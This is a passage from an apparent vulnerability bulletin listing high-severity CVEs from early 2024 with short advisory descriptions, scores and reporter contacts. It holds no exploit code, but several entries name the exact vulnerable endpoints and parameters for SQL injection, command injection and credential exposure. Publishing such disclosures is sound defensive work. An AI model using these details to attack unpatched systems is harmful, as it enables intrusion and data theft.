prestashop — prestashop PrestaShop is an open-source e-commerce platform. Prior to versions 8.1.3 and 1.7.8.11, some event attributes are not detected by the `isCleanHTML` method. Some modules using the `isCleanHTML` method could be vulnerable to cross-site scripting. Versions 8.1.3 and 1.7.8.11 contain a patch for this issue. The best workaround is to use the `HTMLPurifier` library to sanitize html input coming from users. The library is already available as a dependency in the PrestaShop project. Beware though that in legacy object models, fields of `HTML` type will call `isCleanHTML`. 2024-01-02 8.1 CVE-2024-21627
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
priva — topcontrol_suite The Priva TopControl Suite contains predictable credentials for the SSH service, based on the Serial number. Which makes it possible for an attacker to calculate the login credentials for the Priva TopControll suite. 2024-01-02 7.5 CVE-2022-3010
csirt@divd.nl
csirt@divd.nl
csirt@divd.nl
qnap_systems_inc. — qts/quts_hero A prototype pollution vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to override existing attributes with ones that have incompatible type, which may lead to a crash via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later 2024-01-05 7.5 CVE-2023-39296
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie An OS command injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 7.4 CVE-2023-47560
security@qnapsecurity.com.tw
qnap_systems_inc. — video_station An OS command injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following version: Video Station 5.7.2 ( 2023/11/23 ) and later 2024-01-05 8.8 CVE-2023-41288
security@qnapsecurity.com.tw
qualcomm,_inc. — snapdragon Memory corruption in Data Modem when a non-standard SDP body, during a VOLTE call. 2024-01-02 9.8 CVE-2023-33025
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in HLOS while running playready use-case. 2024-01-02 9.3 CVE-2023-33030
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in TZ Secure OS while requesting a memory allocation from TA region. 2024-01-02 9.3 CVE-2023-33032
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Audio during playback with speaker protection. 2024-01-02 8.4 CVE-2023-33033
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while running VK synchronization with KASAN enabled. 2024-01-02 8.4 CVE-2023-33094
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Graphics Driver when destroying a context with KGSL_GPU_AUX_COMMAND_TIMELINE objects queued. 2024-01-02 8.4 CVE-2023-33108
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption when resource manager sends the host kernel a reply message with multiple fragments. 2024-01-02 8.4 CVE-2023-33113
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while running NPU, when NETWORK_UNLOAD and (NETWORK_UNLOAD or NETWORK_EXECUTE_V2) commands are submitted at the same time. 2024-01-02 8.4 CVE-2023-33114
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while invoking IOCTLs calls from user space for internal mem MAP and internal mem UNMAP. 2024-01-02 8.4 CVE-2023-43514
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Information disclosure in Core services while processing a Diag command. 2024-01-02 7.6 CVE-2023-33014
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Permanent DOS in Hypervisor while untrusted VM without PSCI support makes a PSCI call. 2024-01-02 7.1 CVE-2023-33036
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Cryptographic issue in Automotive while unwrapping the key secs2d and verifying with RPMB data. 2024-01-02 7.1 CVE-2023-33037
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS in Data Modem during DTLS handshake. 2024-01-02 7.5 CVE-2023-33040
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS in WLAN Firmware while parsing a BTM request. 2024-01-02 7.5 CVE-2023-33062
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in wearables while processing data from AON. 2024-01-02 7.8 CVE-2023-33085
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while processing a WMI P2P listen start command (0xD00A) sent from host. 2024-01-02 7.5 CVE-2023-33109
product-security@qualcomm.com
qualcomm,_inc. — snapdragon The session index variable in PCM host voice audio driver initialized before PCM open, accessed during event callback from ADSP and reset during PCM close may lead to race condition between event callback – PCM close and reset session index causing memory corruption. 2024-01-02 7.8 CVE-2023-33110
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS when WLAN firmware receives “reassoc response” frame including RIC_DATA element. 2024-01-02 7.5 CVE-2023-33112
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing ieee80211_parse_mscs_ie in WIN WLAN driver. 2024-01-02 7.5 CVE-2023-33116
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption when HLOS allocates the response payload buffer to copy the data received from ADSP in response to AVCS_LOAD_MODULE command. 2024-01-02 7.8 CVE-2023-33117
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while processing Listen Sound Model client payload buffer when there is a request for Listen Sound session get parameter from ST HAL. 2024-01-02 7.8 CVE-2023-33118
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption in Audio when memory map command is executed consecutively in ADSP. 2024-01-02 7.8 CVE-2023-33120
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing IPv6 extension header when WLAN firmware receives an IPv6 packet that contains `IPPROTO_NONE` as the next header. 2024-01-02 7.5 CVE-2023-43511
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Transient DOS while parsing GATT service data when the total amount of memory that is required by the multiple services is greater than the actual size of the services buffer. 2024-01-02 7.5 CVE-2023-43512
product-security@qualcomm.com
red_hat — red_hat_developer_hub A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately. 2024-01-04 7.3 CVE-2023-6944
secalert@redhat.com
secalert@redhat.com
s-cms — s-cms A vulnerability classified as critical was found in S-CMS up to 2.0_build20220529-20231006. Affected by this vulnerability is an unknown functionality of the file /s/index.php?action=statistics. The manipulation of the argument lid leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249391. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7189
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
s-cms — s-cms A vulnerability, which was classified as critical, has been found in S-CMS up to 2.0_build20220529-20231006. Affected by this issue is some unknown functionality of the file /member/ad.php?action=ad. The manipulation of the argument A_text/A_url/A_contact leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7190
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
s-cms — s-cms A vulnerability, which was classified as critical, was found in S-CMS up to 2.0_build20220529-20231006. This affects an unknown part of the file member/reg.php. The manipulation of the argument M_login/M_email leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249393 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7191
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
scone — scone Improper initialization of x87 and SSE floating-point configuration registers in the __scone_entry component of SCONE before 5.8.0 for Intel SGX allows a local attacker to compromise the execution integrity of floating-point operations in an enclave or access sensitive information via side-channel analysis. 2023-12-30 7.8 CVE-2022-46487
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
shifuml — shifu A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151. 2023-12-29 8.1 CVE-2023-7148
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
shipping_100_fahuo100 — shipping_100_fahuo100 A vulnerability classified as critical has been found in Shipping 100 Fahuo100 up to 1.1. Affected is an unknown function of the file member/login.php. The manipulation of the argument M_pwd leads to sql injection. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-249390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.1 CVE-2023-7188
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sidequestvr — sidequest SideQuest is a place to get virtual reality applications for Oculus Quest. The SideQuest desktop application uses deep links with a custom protocol (`sidequest://`) to trigger actions in the application from its web contents. Because, prior to version 0.10.35, the deep link URLs were not sanitized properly in all cases, a one-click remote code execution can be achieved in cases when a device is connected, the user is presented with a malicious link and clicks it from within the application. As of version 0.10.35, the custom protocol links within the electron application are now being parsed and sanitized properly. 2024-01-04 8.8 CVE-2024-21625
security-advisories@github.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing DICOM files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15097) 2024-01-04 7.8 CVE-2021-40367
productcert@siemens.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing BMP files. This could result in an out-of-bounds write past the end of an allocated structure. An attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-14860) 2024-01-04 7.8 CVE-2021-42028
productcert@siemens.com
siemens — syngo_fastview A vulnerability has been identified in syngo fastView (All versions). The affected application lacks proper validation of user-supplied data when parsing BMP files. This could result in a write-what-where condition and an attacker could leverage this vulnerability to execute code in the context of the current process. (ZDI-CAN-15696) 2024-01-04 7.8 CVE-2021-45465
productcert@siemens.com
silicon_labs — gecko_sdk An unvalidated input in Silicon Labs TrustZone implementation in v4.3.x and earlier of the Gecko SDK allows an attacker to access the trusted region of memory from the untrusted region. 2024-01-02 9.3 CVE-2023-4280
product-security@silabs.com
product-security@silabs.com
small_crm — small_crm PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection on the Users login panel because of “password” parameter is directly used in the SQL query without any sanitization and the SQL Injection payload being executed. 2023-12-29 9.8 CVE-2023-50035
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject. 2023-12-29 8.8 CVE-2023-50070
cve@mitre.org
cve@mitre.org
sourcecodester — customer_support_system Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name. 2023-12-29 8.8 CVE-2023-50071
cve@mitre.org
cve@mitre.org
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/ of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-249440. 2024-01-01 7.3 CVE-2024-0182
cna@vuldb.com
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179. 2023-12-29 9.8 CVE-2023-7157
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability. 2023-12-29 8.8 CVE-2023-7155
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sqlite — sqlite3 A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999. 2023-12-29 9.8 CVE-2023-7104
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tencent — tencent_distributed_sql Tencent tdsqlpcloud through 1.8.5 allows unauthenticated remote attackers to discover database credentials via an index.php/api/install/get_db_info request, a related issue to CVE-2023-42387. 2023-12-31 7.5 CVE-2023-52286
cve@mitre.org
testlink — testlink TestLink through 1.9.20 allows type juggling for authentication bypass because === is not used. 2023-12-30 7.5 CVE-2023-50110
cve@mitre.org
tj-actions — verify-changed-files The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`. This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments. 2023-12-29 7.7 CVE-2023-52137
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
totolink — n350rt_firmware A vulnerability was found in Totolink N350RT 9.3.5u.6139_B20201216. It has been rated as critical. This issue affects some unknown processing of the file /cgi-bin/cstecgi.cgi?action=login&flag=ie8 of the component HTTP POST Request Handler. The manipulation leads to stack-based buffer overflow. The exploit has been disclosed to the public and may be used. The identifier VDB-249389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7187
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRoute. 2023-12-30 9.8 CVE-2023-51133
cve@mitre.org
cve@mitre.org
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formPasswordSetup. 2023-12-30 9.8 CVE-2023-51135
cve@mitre.org
cve@mitre.org
totolink — x2000r_firmware TOTOLINK X2000R Gh v1.0.0-B20230221.0948.web was discovered to contain a stack overflow via the function formRebootSchedule. 2023-12-30 9.8 CVE-2023-51136
cve@mitre.org
cve@mitre.org
totolink — x6000r_firmware TOTOLINK X6000R v9.4.0cu.852_B20230719 was discovered to contain a remote command execution (RCE) vulnerability via the component /cgi-bin/cstecgi.cgi. 2023-12-30 9.8 CVE-2023-50651
cve@mitre.org
cve@mitre.org
unified_remote — unified_remote Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. 2023-12-30 9.8 CVE-2023-52252
cve@mitre.org
cve@mitre.org
ween_software — admin_panel Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ween Software Admin Panel allows SQL Injection. This issue affects Admin Panel: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4541
iletisim@usom.gov.tr
wireshark_foundation — wireshark HTTP3 dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0207
cve@gitlab.com
cve@gitlab.com
wireshark_foundation — wireshark GVCP dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0208
cve@gitlab.com
cve@gitlab.com
wireshark_foundation — wireshark IEEE 1609.2 dissector crash in Wireshark 4.2.0, 4.0.0 to 4.0.11, and 3.6.0 to 3.6.19 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0209
cve@gitlab.com
cve@gitlab.com
wireshark_foundation — wireshark Zigbee TLV dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0210
cve@gitlab.com
cve@gitlab.com
wireshark_foundation — wireshark DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file 2024-01-03 7.8 CVE-2024-0211
cve@gitlab.com
cve@gitlab.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in JS Help Desk JS Help Desk – Best Help Desk & Support Plugin. This issue affects JS Help Desk – Best Help Desk & Support Plugin through 2.7.1. 2024-01-05 10 CVE-2022-46839
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN. This issue affects WP MLM SOFTWARE PLUGIN through 4.0. 2023-12-29 10 CVE-2023-51475
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in David F. Carr RSVPMaker. This issue affects RSVPMaker through 10.6.6. 2023-12-29 9.8 CVE-2023-25054
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Shabti Kaplan Frontend Admin by DynamiApps. This issue affects Frontend Admin by DynamiApps through 3.18.3. 2023-12-29 9.8 CVE-2023-51411
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Piotnet Piotnet Forms. This issue affects Piotnet Forms through 1.0.25. 2023-12-29 9.8 CVE-2023-51412
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in EnvialoSimple EnvíaloSimple: Email Marketing y Newsletters. This issue affects EnvíaloSimple: Email Marketing y Newslettersthrough 2.1. 2023-12-29 9.8 CVE-2023-51414
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Bertha.Ai BERTHA AI. Your AI co-pilot for WordPress and Chrome. This issue affects BERTHA AI. Your AI co-pilot for WordPress and Chrome through 1.11.10.7. 2023-12-29 9.8 CVE-2023-51419
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce through 4.5.2. 2023-12-29 9.9 CVE-2023-51421
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition through 3.05.0. 2023-12-31 9.8 CVE-2023-51423
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site through 3.10.1. 2023-12-29 9.8 CVE-2023-51468
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Mestres do WP Checkout Mestres WP. This issue affects Checkout Mestres WP through 7.1.9.6. 2023-12-31 9.8 CVE-2023-51469
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Pixelemu TerraClassifieds – Simple Classifieds Plugin. This issue affects TerraClassifieds – Simple Classifieds Plugin through 2.0.3. 2023-12-29 9.8 CVE-2023-51473
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in realmag777 Active Products Tables for WooCommerce. Professional products tables for WooCommerce store. This issue affects Active Products Tables for WooCommerce. Professional products tables for WooCommerce store through 1.0.6. 2023-12-29 9.8 CVE-2023-51505
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Presslabs Theme per user. This issue affects Theme per userthrough 1.0.1. 2023-12-31 9.8 CVE-2023-52181
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in Anders Thorborg. This issue affects Anders Thorborg through 1.4.12. 2023-12-29 8.8 CVE-2023-22676
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in BinaryStash WP Booklet. This issue affects WP Booklet through 2.1.8. 2023-12-29 8.8 CVE-2023-22677
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Milan Dini? Rename Media Files. This issue affects Rename Media Files through 1.0.1. 2023-12-29 8.8 CVE-2023-32095
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor through 2.6.10. 2023-12-31 8.8 CVE-2023-39157
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in TienCOP WP EXtra. This issue affects WP EXtra through 6.2. 2023-12-29 8.8 CVE-2023-46623
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Qode Interactive Qode Essential Addons. This issue affects Qode Essential Addons through 1.5.2. 2023-12-29 8.8 CVE-2023-47840
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Brainstorm Force Astra Pro. This issue affects Astra Pro through 4.3.1. 2023-12-29 8.8 CVE-2023-49830
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in InspireUI MStore API. This issue affects MStore API through 4.10.1. 2023-12-29 8.8 CVE-2023-50878
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPExpertsio New User Approve. This issue affects New User Approve through 2.5.1. 2023-12-29 8.8 CVE-2023-50902
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WebbaPlugins Appointment & Event Booking Calendar Plugin – Webba Booking. This issue affects Appointment & Event Booking Calendar Plugin – Webba Booking through 4.5.33. 2023-12-29 8.8 CVE-2023-51354
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bright Plugins Block IPs for Gravity Forms. This issue affects Block IPs for Gravity Forms through 1.0.1. 2023-12-29 8.8 CVE-2023-51358
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Rise Themes Rise Blocks – A Complete Gutenberg Page Builder. This issue affects Rise Blocks – A Complete Gutenberg Page Builder through 3.1. 2023-12-29 8.8 CVE-2023-51378
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Brain Storm Force Ultimate Addons for WPBakery Page Builder. This issue affects Ultimate Addons for WPBakery Page Builder through 3.19.17. 2023-12-29 8.8 CVE-2023-51402
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPVibes WP Mail Log. This issue affects WP Mail Log through 1.1.2. 2023-12-29 8.8 CVE-2023-51410
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Joris van Montfort JVM Gutenberg Rich Text Icons. This issue affects JVM Gutenberg Rich Text Icons through 1.2.3. 2023-12-29 8.8 CVE-2023-51417
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Soft8Soft LLC Verge3D Publishing and E-Commerce. This issue affects Verge3D Publishing and E-Commerce through 4.5.2. 2023-12-29 8.8 CVE-2023-51420
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. This issue affects Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition through 3.05.0. 2023-12-29 8.8 CVE-2023-51422
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Jacques Malgrange Rencontre – Dating Site. This issue affects Rencontre – Dating Site through 3.11.1. 2023-12-29 8.8 CVE-2023-51470
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF), Deserialization of Untrusted Data vulnerability in ThemeHigh Job Manager & Career – Manage job board listings, and recruitments. This issue affects Job Manager & Career – Manage job board listings, and recruitments through 1.4.4. 2023-12-29 8.8 CVE-2023-51545
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WhileTrue Most And Least Read Posts Widget. This issue affects Most And Least Read Posts Widget through 2.5.16. 2023-12-31 8.8 CVE-2023-52133
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Ovation S.R.L. Dynamic Content for Elementor. This issue affects Dynamic Content for Elementor before 2.12.5. 2024-01-05 8.8 CVE-2023-52150
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in ARI Soft ARI Stream Quiz – WordPress Quizzes Builder. This issue affects ARI Stream Quiz – WordPress Quizzes Builder through 1.3.0. 2023-12-31 8.8 CVE-2023-52182
audit@patchstack.com
wordpress — wordpress The OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin’s settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. PLease note there were several attempted patched, and we consider 5.7.10 to be the most sufficiently patched. 2024-01-03 8.6 CVE-2023-6600
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login. This issue affects miniOrange’s Google Authenticator – WordPress Two Factor Authentication – 2FA , Two Factor, OTP SMS and Email | Passwordless login through 5.6.1. 2023-12-29 7.5 CVE-2022-44589
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in Kanban for WordPress Kanban Boards for WordPress. This issue affects Kanban Boards for WordPress through 2.5.21. 2023-12-29 7.2 CVE-2023-40606
audit@patchstack.com
wordpress — wordpress Improper Control of Generation of Code (‘Code Injection’) vulnerability in POSIMYTH Nexter Extension. This issue affects Nexter Extension through 2.0.3. 2023-12-29 7.2 CVE-2023-45751
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WebFactory Ltd Login Lockdown – Protect Login Form. This issue affects Login Lockdown – Protect Login Form through 2.06. 2023-12-29 7.2 CVE-2023-50837
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Stripe Payment Gateway. This issue affects WooCommerce Stripe Payment Gateway through 7.6.1. 2024-01-05 7.5 CVE-2023-51502
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo through 6.9.2. 2023-12-31 7.5 CVE-2023-51503
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Senol Sahin AI Power: Complete AI Pack – Powered by GPT-4. This issue affects AI Power: Complete AI Pack – Powered by GPT-4 through 1.8.2. 2023-12-29 7.5 CVE-2023-51527
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPManageNinja LLC Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin. This issue affects Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin through 1.7.6. 2023-12-31 7.2 CVE-2023-51547
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode Product Catalog Simple. This issue affects Product Catalog Simple through 1.7.6. 2023-12-29 7.5 CVE-2023-51687
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress. This issue affects eCommerce Product Catalog Plugin for WordPress through 3.3.26. 2023-12-29 7.5 CVE-2023-51688
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WP Zinc Page Generator. This issue affects Page Generator through 1.7.1. 2023-12-31 7.2 CVE-2023-52131
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Jewel Theme WP Adminify. This issue affects WP Adminify through 3.1.6. 2023-12-31 7.2 CVE-2023-52132
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Eyal Fitoussi GEO my WordPress. This issue affects GEO my WordPress through 4.0.2. 2023-12-31 7.2 CVE-2023-52134
audit@patchstack.com
